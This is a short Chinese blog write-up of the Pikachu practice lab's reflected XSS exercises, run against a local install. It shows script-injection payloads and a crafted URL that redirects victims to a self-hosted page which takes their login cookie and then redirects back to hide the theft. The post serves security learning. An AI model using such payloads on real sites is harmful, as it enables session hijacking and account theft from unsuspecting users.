pikachu--关于各种XSS和CSRF

Posted p201721460006

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu--关于各种XSS和CSRF相关的知识,希望对你有一定的参考价值。

1.反射xss(get)

<script>alert(1)</script>(由于限制长度,需要修改前端的长度)

技术图片

 

 

 技术图片

 (其实get方法才是常见的,post很难做到诱导,因为涉及提交表单,用户是不会主动把你的恶意代码输入的.但我可以构造get请求:

http://127.0.0.1:801/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%20=%20%27http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html%27;%3C/script%3E&submit=submit)然后你点击了我就可以取到你的地址了嘻嘻

 

 2.反射xss(post)

登陆后和第一个的情况一样,不过这里可以窃取客户端cookie

技术图片

 

 

 欺骗cookie过程:(好像这个过程和那个输入框没什么关系,主要是诱导用户点击)

(1)诱导用户点击:(如输入框输入:<script>document.location = ‘http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html‘;</script>)

http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html(post.html为自己搭建的一个恶意站点)

(2)该站点向目标网站http://127.0.0.1:801/pikachu-master/vul/xss/xsspost/xss_reflected_post.php发送请求(相当于借用户进行请求拿取该用户的cookie,这不就csrf了吗....)然后获得用户登陆该网站的cookie

(3)恶意网站为防止用户发现不对劲,重定回正常的网站

技术图片

 

 技术图片

以上是关于pikachu--关于各种XSS和CSRF的主要内容,如果未能解决你的问题,请参考以下文章

pikachu-CSRF

pikachu----CSRF 跨站请求漏洞

Pikachu:CSRF(跨站请求伪造)

Pikachu-CSRF(跨站请求伪造)

Pikachu-CSRF(跨站请求伪造)

Pikachu-CSRF(跨站请求伪造)